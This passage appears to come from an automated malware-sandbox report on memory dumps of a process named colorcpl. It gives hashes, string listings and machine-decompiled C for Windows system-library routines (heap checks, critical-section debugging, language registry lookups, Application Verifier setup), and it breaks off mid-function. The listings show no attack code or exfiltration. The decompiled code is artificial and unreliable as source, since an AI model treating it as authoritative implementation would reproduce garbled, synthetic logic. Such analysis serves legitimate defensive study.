SetErrorMode.KERNELBASE(00008003,?,00148D14,?), ref: 0014F6EB

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 9f07156f568db1bf1ce5602aa541749729424fb916a688c734224b2528d561bc
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: C9D0A7727503043BE610FEA49C03F2633CCAB54B14F490074F948DB3C3DA64E4014165

Uniqueness

Uniqueness Score: -1.00%

Function 0015A831 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0014F1C2,0014F1C2,?,00000000,?,?), ref: 0015A7F0

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a2f105bc1e74d9d70f615b716723ad0135a3d21058889328619839b10f3c7fdd
Instruction ID: cb87b030e529f7b65d83a7f396cf69e600e6bdad1397726de227484418ad168a
Opcode Fuzzy Hash: a2f105bc1e74d9d70f615b716723ad0135a3d21058889328619839b10f3c7fdd
Instruction Fuzzy Hash: 64C09B7634413559D620F7B4EC444EBF739EFC83523A08655EE58571058633855D5690

Uniqueness

Uniqueness Score: -1.00%

Function 04382B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04382B44

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 731172e6149c38504a5a67d4ca7b282db8f52e93533315a069fe29d43fb6c0e2
Instruction ID: ec557778be7f740e006bd62207bc0d72882d62f5433553e74c2f8cf0053423c3
Opcode Fuzzy Hash: 731172e6149c38504a5a67d4ca7b282db8f52e93533315a069fe29d43fb6c0e2
Instruction Fuzzy Hash: 20B02B318030C0C5FF01FB20070CB07794067C1300F11D095D1020240E4338D080F131

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04378540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

8, xrefs: 043B50EE
Address of the debug info found in the active list., xrefs: 043B52B9, 043B5305
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043B52D9
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043B52ED
undeleted critical section in freed memory, xrefs: 043B5236
Invalid debug info address of this critical section, xrefs: 043B52C1
corrupted critical section, xrefs: 043B52CD
double initialized or corrupted critical section, xrefs: 043B5313
Critical section address., xrefs: 043B530D
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 043B5215, 043B52A1, 043B5324
Thread identifier, xrefs: 043B5345
Critical section debug info address, xrefs: 043B522A, 043B5339
Thread is in a state in which it cannot own a critical section, xrefs: 043B534E
Critical section address, xrefs: 043B5230, 043B52C7, 043B533F

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 8cf7c4cf3b8559b6fb459acd7b66450b5b6407af3fdf141566f8c8646cccc5c1
Instruction ID: 696908532853a18adc7db6d14b776621cfd8268621c70178f83f9df312a5dbb4
Opcode Fuzzy Hash: 8cf7c4cf3b8559b6fb459acd7b66450b5b6407af3fdf141566f8c8646cccc5c1
Instruction Fuzzy Hash: 5D818D71A41758BFEB24DF94C945BEEBBB4EF08B18F20611AEA44A7640D374B941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 043E86C2 Relevance: 12.6, Strings: 10, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E043E86C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x443b370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E04340670() & 0x00010000) != 0) {
					L26:
					 *0x44338c0 = _t90;
					_t90 = 1;
				} else {
					if(E043442B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E04374E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = E04387AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = E04387AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x431708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E04374F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = E04387AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return E04384B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}

0x043e86c2
0x043e86c2
0x043e86ca
0x043e86d7
0x043e86e6
0x043e86e8
0x043e86f3
0x043e86fe
0x043e8700
0x043e870b
0x043e8716
0x043e8721
0x043e872c
0x043e873a
0x043e8892
0x043e8892
0x043e889a
0x043e8740
0x043e875e
0x043e877f
0x043e877f
0x043e8787
0x043e87c0
0x00000000
0x043e87c6
0x043e87c8
0x043e87d1
0x043e87d3
0x043e87d9
0x043e87e8
0x043e87e8
0x043e87ee
0x00000000
0x00000000
0x043e87e2
0x043e87f4
0x043e884f
0x043e8853
0x043e8875
0x043e8886
0x043e888b
0x043e8890
0x00000000
0x00000000
0x043e8890
0x043e87f6
0x043e87f6
0x043e87f6
0x043e87f9
0x043e87ff
0x043e8801
0x043e8803
0x043e8807
0x043e8807
0x043e8811
0x043e8816
0x043e881b
0x043e8839
0x00000000
0x043e881d
0x043e881d
0x043e881d
0x043e8820
0x043e8820
0x043e8823
0x043e8826
0x043e882d
0x043e8835
0x00000000
0x043e8837
0x00000000
0x043e8837
0x043e8835
0x00000000
0x043e883d
0x043e8841
0x043e8845
0x043e8846
0x043e884a
0x043e8807
0x00000000
0x043e87ff
0x043e87e4
0x043e87e4
0x043e87e5
0x00000000
0x043e87e5
0x00000000
0x043e87e2
0x00000000
0x043e87f0
0x043e87c8
0x043e8789
0x043e8789
0x043e878e
0x043e8793
0x043e8796
0x043e879e
0x00000000
0x00000000
0x043e87b2
0x043e879e
0x043e8760
0x043e876f
0x043e8774
0x043e8779
0x00000000
0x00000000
0x00000000
0x00000000
0x043e8779
0x043e875e
0x043e889b
0x043e88a4
0x043e88a5
0x043e88b0

Strings

csrss.exe, xrefs: 043E8700
services.exe, xrefs: 043E8716
SegmentHeap, xrefs: 043E8769
svchost.exe, xrefs: 043E86E8
smss.exe, xrefs: 043E870B
heapType, xrefs: 043E874B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 043E8750
lsass.exe, xrefs: 043E8721
runtimebroker.exe, xrefs: 043E86F3
DefaultBrowser_NOPUBLISHERID, xrefs: 043E8880

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: e312eca77b0ed89b2d36194ea12b8951a573bc09d8b5fffea6d9c834fc3b0c8f
Instruction ID: 779b191ad5a47eeded16c39f07cccaa5376aef80805d4fc03cb5979f6cfa5e21
Opcode Fuzzy Hash: e312eca77b0ed89b2d36194ea12b8951a573bc09d8b5fffea6d9c834fc3b0c8f
Instruction Fuzzy Hash: E85192719053219BD329EF168844BABB7E8EF84754F04691DFDA983290E734F506C792

Uniqueness

Uniqueness Score: -1.00%

Function 0433D02D Relevance: 10.2, Strings: 8, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0433D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E04385050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E04382AB0() >= 0) {
						_t182 = E043FADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E04382A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E04382A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E04382A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E0433DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E043FAD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						E04382A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E0433D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E04385050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E04382AB0();
						}
						if(_t128 < 0) {
							E04385050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E04382AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E04385050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E04382AB0() >= 0) {
							_t170 = _v144;
							_t182 = E043FADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E04385050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E04382AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E0433D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}

0x0433d035
0x0433d03f
0x0433d042
0x0433d044
0x0433d048
0x0433d04c
0x0433d050
0x0433d056
0x0439a5a1
0x00000000
0x0433d065
0x0433d067
0x0433d075
0x0433d07c
0x0433d081
0x0433d085
0x0433d08f
0x0433d093
0x0433d094
0x0433d09d
0x0433d0a5
0x0433d0a6
0x0433d0aa
0x0433d0b5
0x0439a52a
0x0439a52e
0x0433d194
0x0433d199
0x0433d19b
0x0433d19f
0x0433d19f
0x0433d1a9
0x0439a5ab
0x0439a5af
0x0439a5af
0x0433d1b4
0x0433d1b6
0x0433d1ba
0x0433d1ba
0x0433d1c1
0x0439a5bb
0x00000000
0x00000000
0x0439a5c1
0x0439a5c7
0x00000000
0x00000000
0x0439a5d0
0x0439a5df
0x0439a5df
0x00000000
0x0433d1c7
0x0433d1ca
0x0433d1de
0x0433d1e6
0x0433d1e6
0x0433d1cf
0x0433d1d4
0x0433d1d8
0x0439a5e6
0x0439a5ea
0x0439a5ef
0x0439a5ef
0x0439a5ef
0x00000000
0x0433d1d8
0x0433d1c1
0x0439a537
0x0439a541
0x0439a54d
0x0439a558
0x0439a558
0x0439a54d
0x0439a559
0x0439a55d
0x0439a562
0x0439a569
0x0439a569
0x0433d0bf
0x0433d0cc
0x0439a56f
0x0439a56f
0x0433d0d5
0x0433d1ec
0x00000000
0x00000000
0x0433d1fc
0x0433d2de
0x0433d202
0x0433d20c
0x0433d215
0x0433d21a
0x0433d222
0x0433d22a
0x0433d232
0x0433d23d
0x0433d23e
0x0433d247
0x0433d24e
0x0433d24f
0x0433d25a
0x0433d25a
0x0433d261
0x0433d26d
0x0433d272
0x0433d27b
0x0433d283
0x0433d28b
0x0433d293
0x0433d2a1
0x0433d2a2
0x0433d2ab
0x0433d2b2
0x0433d2b3
0x0433d2c3
0x0433d2c7
0x00000000
0x0433d2e5
0x0433d2c7
0x00000000
0x0433d0db
0x0433d0e0
0x0433d192
0x0433d192
0x00000000
0x0433d192
0x0433d0f0
0x0433d0f9
0x0433d0fe
0x0433d103
0x0433d10d
0x0433d10e
0x0433d116
0x0433d117
0x0433d120
0x0433d124
0x0433d125
0x0433d130
0x0439a580
0x0439a58f
0x0439a593
0x00000000
0x00000000
0x0439a59b
0x0439a59b
0x0433d140
0x0433d149
0x0433d14e
0x0433d153
0x0433d158
0x0433d160
0x0433d168
0x0433d169
0x0433d172
0x0433d176
0x0433d177
0x0433d180
0x0433d184
0x0433d2c9
0x0433d2d7
0x00000000
0x0433d18a
0x0433d18a
0x0433d190
0x0433d190
0x00000000
0x00000000
0x00000000
0x0433d190
0x0433d184
0x0433d0d5

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0433D263
@, xrefs: 0433D09D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0433D06F
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0433D202
@, xrefs: 0433D24F
Control Panel\Desktop\LanguageConfiguration, xrefs: 0433D136
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0433D0E6
@, xrefs: 0433D2B3

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 0ea5d437fbea9b6e03a75244f7bb7175cd7cce231876d3cc40675fc8d45f7392
Instruction ID: 2a756a2bc25229cba948101ecd6154d7cb10a7fe398d5ca84a06db4de570fafd
Opcode Fuzzy Hash: 0ea5d437fbea9b6e03a75244f7bb7175cd7cce231876d3cc40675fc8d45f7392
Instruction Fuzzy Hash: C1A14EB1A083459FE761EF24C480B5BF7E8AF8471AF00592EF59996240E774E908CF92

Uniqueness

Uniqueness Score: -1.00%

Function 043EF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

Invalid ReserveSize parameter - %Ix, xrefs: 043EF56B
HEAP: , xrefs: 043EF55F, 043EF5A4, 043EF5F0, 043EF655, 043EF6A3, 043EF6EA
Specified HeapBase (%p) is free or not writable, xrefs: 043EF6F8
HEAP[%wZ]: , xrefs: 043EF552, 043EF597, 043EF5E3, 043EF648, 043EF696, 043EF6DD
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 043EF6B2
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 043EF664
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 043EF5FB
Invalid CommitSize parameter - %Ix, xrefs: 043EF5B2

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 9a16b3e092c0ffb92916774efd23bc24031766543ef9e0618f91d3a280766b3b
Instruction ID: a29f335d2f4504d9f2a25f0df543a62415ac526c023a60b077956ceb00ff17c3
Opcode Fuzzy Hash: 9a16b3e092c0ffb92916774efd23bc24031766543ef9e0618f91d3a280766b3b
Instruction Fuzzy Hash: 17513536202654FFE715DF96C844F3AB3A8EF08B69F15A45AF4019B6A2D6B1F940CE10

Uniqueness

Uniqueness Score: -1.00%

Function 043C8633 Relevance: 9.0, Strings: 7, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E043C8633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E043C36EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x4435a74 = _t52;
							 *0x4435000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x4435238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E04336CC0(_t127, L"HandleTraces", 4, 0x44369d8, 4, 0);
									}
									E04336CC0(_t127, L"VerifierDebug", 4, 0x44369dc, 4, 0);
									E04336CC0(_t127, L"VerifierDlls", 1, 0x4435000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = E043C98B2(0x4311b98, _v8, __eflags, _t127, _a12, 0x4435260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x4435260;
									_t128 = E043C8FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E04371D66(0x4311b98, _t116, 0);
										 *0x4439234 = _v32;
										E04371D66(0x4311b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E04336CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x4435a74; // 0x0
								goto L40;
							}
							 *0x4435a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x4435244 = 0x4435240;
				 *0x4435240 = 0x4435240;
				_t128 = E0436FBC0(0x4435220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x4439234 == 2) {
					_v29 = 0;
					_t128 = E04361934(0x4435308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x4435a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x4435d8c; // 0x2711e28
				_t8 = _t69 + 0x30; // 0x2710fe0
				E043CEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E043C9429(_t115) >= 0) {
					_t130 =  *0x4435240; // 0x0
					while(1) {
						__eflags = _t130 - 0x4435240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E043C919C(_t97, _t130, 0x4435240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E043C8B5E(_t71);
					_t108 = 0x4311b88;
					_t128 = E0435F380(0x4311b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x4435278; // 0x0
						L15:
						_t76 = E0435CF00(_t108, 0, _t131, 0x4311b90, 0,  &_v16, 1, _v0);
						E04371D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x4439238 = _t88 ^ _v16;
							 *0x4439230 = 1;
						}
						 *0x4439231 = 1;
						 *0x4439232 = 1;
						E043C964A(E04371D66(_t108, 0, 1));
						_t124 =  *0x4435240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x4435240;
							if(_t124 == 0x4435240) {
								break;
							}
							_v30 = _t97;
							_t128 = E04361934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x44369dc & 0x00000008;
						if(( *0x44369dc & 0x00000008) != 0) {
